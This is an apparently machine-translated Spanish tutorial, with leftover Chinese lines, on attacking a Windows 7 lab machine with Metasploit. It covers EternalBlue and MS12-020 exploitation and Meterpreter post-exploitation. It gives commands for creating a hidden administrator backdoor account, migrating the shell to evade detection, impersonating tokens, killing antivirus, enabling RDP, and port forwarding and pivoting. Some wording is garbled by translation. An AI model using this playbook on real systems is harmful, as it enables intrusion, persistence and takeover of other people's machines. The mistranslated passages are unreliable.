Metasploit (MSF), para abreviar, es una de las herramientas de penetración más poderosas de Kali y se dice que es una herramienta que puede piratear todo el universo.
En el artículo anterior se introdujo en detalle el uso de las herramientas de MSF y la descripción de cada módulo, este artículo se utiliza como caso para explicarlo en detalle.
Tabla de contenido
1. Composición de herramientas
1. Explotación de vulnerabilidades
2. Configuración de parámetros
3. Manipular el host de destino
5. Implantación de puerta trasera
6. Supongamos que falla la obtención del shell.
9. Comando posterior a la infiltración
12. Configurar la puerta de enlace de enrutamiento
13. Ver todos los usuarios actuales
14. Agregar línea de comando de usuario (sin shell)
1. Composición de herramientas
Aux 辅助模块 主要是信息搜集
Exploits 模块 主要是渗透攻击
Post后渗透攻击模块 攻击主机控制与拓展攻击
Startx 启动进入图形化界面
ifconfig 网卡 172.16.0.22(修改的ip) netmask 255.255.255.0 up
修改网卡配置
2. Método de inicio
El primero es utilizar directamente la herramienta para comenzar.
El segundo es ingresar el comando msfconsole para ingresar a la terminal de msf.
Salir sale del programa exploit
3. Experimentar
ambiente de laboratorio:
La máquina Kali es 192.168.8.39 (experimental)
Objetivo drone win7: 192.168.8.238
Primero, debes hacer ping al dron objetivo.
4. Proceso de ataque
1. msfconsole ingresa al marco de msfconsole
2. Buscar ms12-020 Buscar vulnerabilidad ms12_020
3. use auxliliary/dos/windows/rdp/ms12_020_maxchannelids para usar esta vulnerabilidad
Tenga en cuenta que al buscar ms12-020 para ver esta vulnerabilidad, se muestra la ruta a esta vulnerabilidad.
1. Explotación de vulnerabilidades
Ms17_010 Explotación de EternalBlue
Puertos disponibles. El sí detrás de ellos significa que se pueden utilizar.
2. Configuración de parámetros
Información relacionada con la configuración
1. mostrar opciones para ver la configuración de parámetros relevantes
2. configure RHOSTS 172.16.0.119 Establezca la dirección IP de la máquina de destino
3. nmap –sV 172.16.0.119 escanea los puertos abiertos del host de destino
4. configure RPORT 445 Configure el puerto abierto 445 del dron objetivo
5. corre para iniciar el ataque
Respuesta después de un ataque exitoso
El No. 1 hace referencia a la exitosa cobertura de Eternal Blue
El número 2 se refiere al objetivo y la máquina atacante que establecen una sesión de conexión de shell como sesión1.
3. Manipular el host de destino
Cmd para controlar la máquina de destino
sysinfo muestra información del sistema host remoto
getuid Ver identidad del usuario
captura de pantalla Tome una captura de pantalla de la pantalla actual del host remoto (la captura de pantalla mostrará la ruta para guardar)
4. Obtener cáscara
Obtener el shell de la consola shell
5. Implantación de puerta trasera
Ingrese a la implantación de puerta trasera (cree una nueva cuenta de administrador)
Hack de usuario de red 123456 /add crea un usuario de hack en Windows7
Los administradores del grupo local de red piratean / agregan Agregar usuario de pirateo al grupo de usuarios administradores locales de Windows 7 Usuario de red Ver usuario
Los administradores de net localgroup ven los administradores locales de Windows 7.
La primera forma de hacer una puerta trasera es crear un usuario y la segunda es recordar su usuario administrador local.
6. Supongamos que falla la obtención del shell.
obtener cáscara
¿Qué debemos hacer si el ataque tiene éxito pero no logra obtener el caparazón?
Cuando nuestro ataque tenga éxito, iremos al módulo meterpreter.
Meterpreter debe ampliarse con un módulo que pueda usarse como carga de ataque y que, después de establecer una conexión, pueda penetrar más profundamente en el sistema objetivo.
7. Shell de enlace de proceso
1. Evite la detección y la eliminación vinculando meterpreter shell a un proceso estable
Ps Haga que el programa se ejecute en el host de destino
Getpid Ver el número de proceso del shell meterpreter
Migrar + número de proceso estable (manual) Vincular a través del número de proceso en ejecución
Ejecute post/windows/manage/migrate para migrar procesos automáticamente
8. Falsificación de fichas
Falsificación de tokens ( ampliada )
use incógnito para ingresar a este módulo
list_tokens-u Ver tokens existentes
impersonate_token + suplantación de token de nombre de usuario (debe estar separado por barras dobles)
getuid comprueba si el cambio de identidad se realizó correctamente
9. Comando posterior a la infiltración
2. El impresionante comando post-penetración
sysinfo Ver información del sistema
idletime Verifique el tiempo de ejecución del host de destino
ejecute post/window/gather/checkvm getuid para ver el usuario host actual y sus permisos
ejecute post/windows/manage/killav para desactivar el software antivirus
10. Inicie el puerto remoto
3. Enlace importante: puerto de inicio 3389 del host de destino
ejecute post/windwos/manage/enable_rdp para abrir el puerto
ruta Ver información de LAN
11. Reenvío de puertos
background Ponga la sesión actual en segundo plano (se recomienda abrir una línea de comando separada)
Reenviar el puerto 3389 abierto por la máquina de destino a la máquina local
portfwd add –l 2222 –p 3389 –r 172.16.0.119 (máquina de destino)
ejecute getgui –f 6661 –e se creó la retransmisión TCP local
rdesktop 172.16.0.115:4444 Ejecutar puerto vinculado en Linux nueva ventana
12. Configurar la puerta de enlace de enrutamiento
agregar ruta –net 172.16.0.0 máscara de red 255.255.0.0 gw 172.16.0.115
El significado es: agregue enrutamiento de segmento de red netstat –rn para ver la ruta actual
13. Ver todos los usuarios actuales
14. Agregar línea de comando de usuario (sin shell)
ejecute post/windows/manage/enable_rdp NOMBRE DE USUARIO-xie CONTRASEÑA-123456
Se ha agregado el usuario, pero la máquina de destino debe estar de acuerdo al ejecutar, por lo que es muy inútil.
15、Sesión
Una sesión corresponde a una sesión, que se utiliza para conexiones u operaciones de múltiples shells. Puede ver el número de sesiones en segundo plano a través de sesiones directas.
background pone la sesión actual en segundo plano
sesión -i ID ingresa a la sesión de ID
sesión -k ID cerrar sesión